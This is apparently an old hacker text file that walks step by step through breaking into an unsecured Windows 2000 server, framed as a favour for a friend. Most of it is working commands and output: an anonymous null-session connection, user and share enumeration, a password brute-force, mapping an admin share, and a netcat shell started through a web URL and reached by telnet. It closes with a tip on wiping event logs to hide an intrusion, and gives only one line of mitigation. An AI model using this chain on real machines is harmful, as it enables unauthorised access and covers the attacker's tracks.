0wned in 3 easy steps, or, how easy it REALLY is to break into an unsecured NT system

Shows how easy it REALLY is to break into an unsecured NT system....
A friend of mine asked me to check the security on his newly installed
windows 2000 server since he was running a website off it. All he
would provide me was the IP address. Of course since I knew he was on
DSL I didn't need to do much recon and was able to focus in on his
system directly.
I figured since this was going to be an 'easy' task, I would eschew
any GUI and do this all from command line utilities (they're more fun
anyway J) so my first step was to attempt to establish a null session
using the command
Net use \\192.168.1.1\IPC$ "" /user: ""
Of course, I knew he was a Novell guy and probably hadn't studied NT
security much so it was no surprise to get the response:
The command completed successfully
Ok, now I that I had a Null session to the remote system I used a
program called 'enum' to take a look at the users, shares, and
policies of the system. Using the command
Enum -U -M -S -P -G -L -d 192.168.1.1 >enum.txt
Which provided me with the following output:
server: 192.168.1.1
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
netbios: SERVER
domain: WEB
quota:
paged pool limit: 33554432
non paged pool limit: 1048576
min work set size: 65536
max work set size: 251658240
pagefile limit: 0
time limit: 0
trusted domains:
indeterminate
netlogon done by a PDC server
getting user list (pass 1, index 0)... success, got 3.
Administrator attributes
Guest (Built-in account for guest access to the computer/domain)
attributes: disabled no_passwd
nobody (Built-in account for administering the computer/domain)
attributes:
enumerating shares (pass 1)... got 3 shares, 0 left:
fs: C$ ()
fs: D$ ()
fs: E$ ()
ipc: IPC$ (Remote IPC)
getting machine list (pass 1, index 0)... success, got 0.
Group: Administrators
SERVER\nobody
Group: Backup Operators
Group: Guests
SERVER\Guest
Group: Power Users
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
SERVER\Administrator
cleaning up... success.
As you can see, that's more than enough info to start with. Looking
down the list, it is obvious that the original administrator account
had been renamed to 'nobody' and a fake 'administrator' account had
been set up, most likely with shit permissions.
Needless to say, it was to be the 'nobody' account that I would hit
next with the command:
Nat -o output.txt -u nobody.txt -p passlist.txt 192.168.1.1
Which revealed the password 'sadie' after about 30 minutes. From
there, it was simple to map a drive with
Net use y: \\192.168.1.1\d$ /user:nobody
And then enter the password (sadie) when prompted. From there I was
able to copy netcat into the /scripts directory where I could activate
it at will by typing the command:
http://192.168.1.1/cgi-bin/nc.exe?+-l+-p+5000+-t+-e+cmd.exe
into my browser. From there I only had to drop to a DOS prompt and
type:
TELNET>open 192.168.1.1 5000
To get a command prompt on the remote system.
Needless to say, after I kicked my friends ass, I had him set
RestrictAnonymous=1 which stops both the null connection AND enum from
working. However, there are still a LOT of systems out there that
have RestrictAnonymous=0 (which is the default) and are vulnerable.
Of course I didn't bother to clean the logs since I was there with
permission and I wanted him to see the entries, but had I been there
maliciously, I would have uploaded ClearEventLog and run the command
ClearEL all
which would have cleared all 3 eventlogs and effectively masked my
presence :)
ThePsyko
Public Enemy #7
"God told me to skin you alive"
http://prozac.iscool.net